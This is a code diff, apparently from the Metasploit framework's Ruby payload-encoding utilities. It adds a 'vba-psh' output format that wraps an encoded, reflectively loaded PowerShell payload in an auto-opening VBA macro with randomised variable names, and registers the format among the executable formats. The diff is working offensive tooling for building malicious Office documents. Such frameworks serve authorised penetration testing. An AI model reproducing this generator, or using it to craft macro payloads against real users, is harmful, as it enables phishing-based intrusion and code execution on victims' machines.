@@ -1003,6 +1003,33 @@ def self.to_vba(framework,code,opts = {})
10031003 read_replace_script_template ( "to_mem.vba.template" , hash_sub )
10041004 end
10051005
1006+ def self . to_powershell_vba ( framework , arch , code )
1007+ template_path = File . join ( Msf ::Config . data_directory ,
1008+ "templates" ,
1009+ "scripts" )
1010+
1011+ powershell = Rex ::Powershell ::Command . cmd_psh_payload ( code ,
1012+ arch ,
1013+ template_path ,
1014+ encode_final_payload : true ,
1015+ remove_comspec : true ,
1016+ method : 'reflection' )
1017+
1018+ # Intialize rig and value names
1019+ rig = Rex ::RandomIdentifierGenerator . new ( )
1020+ rig . init_var ( :sub_auto_open )
1021+ rig . init_var ( :var_powershell )
1022+
1023+ hash_sub = rig . to_h
1024+ # VBA has a maximum of 24 line continuations
1025+ line_length = powershell . length / 24
1026+ vba_psh = '"' << powershell . scan ( /.{1,#{ line_length } ) . join ( "\" _\r \n & \" " ) << '"'
1027+
1028+ hash_sub [ :powershell ] = vba_psh
1029+
1030+ read_replace_script_template ( "to_powershell.vba.template" , hash_sub )
1031+ end
1032+
10061033 def self . to_exe_vbs ( exes = '' , opts = { } )
10071034 delay = opts [ :delay ] || 5
10081035 persist = opts [ :persist ] || false
@@ -1933,6 +1960,8 @@ def self.to_executable_fmt(framework, arch, plat, code, fmt, exeopts)
19331960 when 'vba-exe'
19341961 exe = to_executable_fmt ( framework , arch , plat , code , 'exe-small' , exeopts )
19351962 Msf ::Util ::EXE . to_exe_vba ( exe )
1963+ when 'vba-psh'
1964+ Msf ::Util ::EXE . to_powershell_vba ( framework , arch , code )
19361965 when 'vbs'
19371966 exe = to_executable_fmt ( framework , arch , plat , code , 'exe-small' , exeopts )
19381967 Msf ::Util ::EXE . to_exe_vbs ( exe , exeopts . merge ( { :persist => false } ) )
@@ -1982,6 +2011,7 @@ def self.to_executable_fmt_formats
19822011 "psh-cmd" ,
19832012 "vba" ,
19842013 "vba-exe" ,
2014+ "vba-psh" ,
19852015 "vbs" ,
19862016 "war"
19872017 ]
0 commit comments